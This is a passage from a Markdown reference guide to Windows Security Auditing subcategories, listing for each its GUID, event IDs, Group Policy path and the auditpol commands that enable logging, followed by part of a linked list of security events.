- 5142
- 5143
- 5144
- 5168
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit File Share
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-share)
#### File System
- Subcategory GUID: `{0CCE921D-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Varies, depending on how file system SACLs are configured`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4656
- 4658
- 4660
- 4663
- 4664
- 4670
- 4985
- 5051
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit File System
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-system)
#### Filtering Platform Connection
- Subcategory GUID: `{0CCE9226-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 5031
- 5150
- 5151
- 5154
- 5155
- 5156
- 5157
- 5158
- 5159
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Filtering Platform Connection
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-connection)
#### Filtering Platform Packet Drop
- Subcategory GUID: `{0CCE9225-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 5152
- 5153
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Filtering Platform Packet Drop
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-packet-drop)
#### Handle Manipulation
- Subcategory GUID: `{0CCE9223-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4658
- 4690
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Handle Manipulation
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-handle-manipulation)
#### Kernel Object
- Subcategory GUID: `{0CCE921F-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4656
- 4658
- 4660
- 4663
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Kernel Object
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kernel-object)
#### Other Object Access Events
- Subcategory GUID: `{0CCE9227-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium to High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4671
- 4691
- 4698
- 4699
- 4700
- 4701
- 4702
- 5148
- 5149
- 5888
- 5889
- 5890
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Other Object Access Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events)
#### Registry
- Subcategory GUID: `{0CCE921E-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low to Medium, depending on how registry SACLs are configured.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4656
- 4657
- 4658
- 4660
- 4663
- 4670
- 5039
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Registry
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-registry)
#### Removable Storage
- Subcategory GUID: `{0CCE9245-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4656
- 4658
- 4663
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Removable Storage
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-removable-storage)
#### SAM
- Subcategory GUID: `{0CCE9220-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High on domain controllers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4661
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit SAM
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sam)
#### Central Access Policy Staging
- Subcategory GUID: `{0CCE9246-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4818
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Central Access Policy Staging
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-central-access-policy-staging)
### Policy Change
#### Audit Policy Change
- Subcategory GUID: `{0CCE922F-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4715
- 4719
- 4817
- 4902
- 4906
- 4907
- 4908
- 4912
- 4904
- 4905
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Policy Change
- Audit Audit Policy Change
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-audit-policy-change)
#### Authentication Policy Change
- Subcategory GUID: `{0CCE9230-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4670
- 4706
- 4707
- 4716
- 4713
- 4717
- 4718
- 4739
- 4864
- 4865
- 4866
- 4867
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Policy Change
- Audit Authentication Policy Change
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authentication-policy-change)
#### Authorization Policy Change
- Subcategory GUID: `{0CCE9231-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium to High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4703
- 4704
- 4705
- 4670
- 4911
- 4913
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Policy Change
- Audit Authorization Policy Change
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authorization-policy-change)
#### Filtering Platform Policy Change
- Subcategory GUID: `{0CCE9233-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4709
- 4710
- 4711
- 4712
- 5040
- 5041
- 5042
- 5043
- 5044
- 5045
- 5046
- 5047
- 5048
- 5440
- 5441
- 5442
- 5443
- 5444
- 5446
- 5448
- 5449
- 5450
- 5456
- 5457
- 5458
- 5459
- 5460
- 5461
- 5462
- 5463
- 5464
- 5465
- 5466
- 5467
- 5468
- 5471
- 5472
- 5473
- 5474
- 5477
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Policy Change
- Audit Filtering Platform Policy Change
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-policy-change)
#### MPSSVC Rule-Level Policy Change
- Subcategory GUID: `{0CCE9232-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4944
- 4945
- 4946
- 4947
- 4948
- 4949
- 4950
- 4951
- 4952
- 4953
- 4954
- 4956
- 4957
- 4958
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Policy Change
- Audit MPSSVC Rule-Level Policy Change
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-mpssvc-rule-level-policy-change)
#### Other Policy Change Events
- Subcategory GUID: `{0CCE9234-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium to High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4714
- 4819
- 4826
- 4909
- 4910
- 5063
- 5064
- 5065
- 5066
- 5067
- 5068
- 5069
- 5070
- 5447
- 6144
- 6145
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Policy Change
- Audit Other Policy Change Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-policy-change-events)
### Privilege Use
#### Non Sensitive Privilege Use
- Subcategory GUID: `{0CCE9229-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Very High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4673
- 4674
- 4985
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Privilege Use
- Audit Non Sensitive Privilege Use
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-non-sensitive-privilege-use)
#### Other Privilege Use Events
- Subcategory GUID: `{0CCE922A-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4985
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Privilege Use
- Audit Other Privilege Use Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-privilege-use-events)
#### Sensitive Privilege Use
- Subcategory GUID: `{0CCE9228-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4673, 4674, 4985
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Privilege Use
- Audit Sensitive Privilege Use
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sensitive-privilege-use)
### System
#### IPsec Driver
- Subcategory GUID: `{0CCE9213-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4960
- 4961
- 4962
- 4963
- 4965
- 5478
- 5479
- 5480
- 5483
- 5484
- 5485
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- System
- Audit IPsec Driver
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-driver)
#### Other System Events
- Subcategory GUID: `{0CCE9214-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 5024
- 5025
- 5027
- 5028
- 5029
- 5030
- 5032
- 5033
- 5034
- 5035
- 5037
- 5058
- 5059
- 6400
- 6401
- 6402
- 6403
- 6404
- 6405
- 6406
- 6407
- 6408
- 6409
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- System
- Audit Other System Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-system-events)
#### Security State Change
- Subcategory GUID: `{0CCE9210-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4608
- 4616
- 4621
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- System
- Audit Security State Change
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-state-change)
#### Security System Extension
- Subcategory GUID: `{0CCE9211-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4610
- 4611
- 4614
- 4622
- 4697
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- System
- Audit Security System Extension
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-system-extension)
#### System Integrity
- Subcategory GUID: `{0CCE9212-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4612
- 4615
- 4618
- 4816
- 5038
- 5056
- 5062
- 5057
- 5060
- 5061
- 6281
- 6410
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- System
- Audit System Integrity
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-system-integrity)
### Global Object Access Auditing
TBD
## Full Event(s) List
Expand Full List
- [1100: The event logging service has shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1100)
- [1102: The audit log was cleared.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102)
- [1104: The security log is now full.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1104)
- [1105: Event log automatic backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1105)
- [1108: The event logging service encountered an error while processing an incoming event published from %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1108)
- [4608: Windows is starting up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4608)
- [4610: An authentication package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4610)
- [4611: A trusted logon process has been registered with the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4611)
- [4612: Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4612)
- [4614: A notification package has been loaded by the Security Account Manager.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4614)
- [4615: Invalid use of LPC port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4615)
- [4616: The system time was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616)
- [4618: A monitored security event pattern has occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4618)
- [4621: Administrator recovered system from CrashOnAuditFail.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4621)
- [4622: A security package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4622)
- [4624: An account was successfully logged on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624)
- [4625: An account failed to log on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625)
- [4625: An account failed to log on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625)
- [4626: User/Device claims information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4626)
- [4627: Group membership information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4627)
- [4634: An account was logged off.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634)
- [4646: Security ID: %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4646)
